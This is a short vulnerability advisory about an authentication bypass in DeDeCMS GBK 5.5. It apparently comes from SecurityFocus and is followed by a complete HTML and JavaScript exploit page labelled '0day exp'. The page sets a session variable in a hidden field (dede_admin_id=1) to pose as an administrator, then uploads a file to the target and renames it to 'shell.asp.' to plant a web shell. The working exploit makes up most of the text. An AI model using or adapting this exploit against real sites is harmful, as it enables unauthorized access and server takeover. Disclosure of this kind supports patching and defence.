source: https://www.securityfocus.com/bid/38469/info
DeDeCMS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input.
Attackers can exploit this issue to gain unauthorized access to the affected application.
DeDeCMS GBK 5.5is vulnerable; other versions may also be affected.<form action="" method='POST' enctype="multipart/form-data"> U R L:<inputtype="text" name="target" size="50" value="http://192.168.1.110"> Path:<inputtype="text" name="path" value="/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php" size="90"><br> File: <inputtype='file' name='uploadfile' size='25'/>(Filetype must be GIF/JPEG etc) RenameTo:<inputtype='test' name='newname' value="shell.asp."/><br> <inputtype=hidden name="_SESSION[dede_admin_id]" value=1><inputtype=hidden name="bkurl" value=1><inputtype='button' value='submit' onclick="fsubmit()"/><br><br><br><br><br><br> dedecms 0day exp..<br> need: session.auto_start =1<br> By toby57 2010/2/22</form><script> function fsubmit(){ var form = document.forms[0]; form.action = form.target.value + form.path.value; tmpstr = form.target.value +'/'+ form.newname.value; form.bkurl.value = tmpstr.substr(0,tmpstr.length-1); form.submit();}</script>
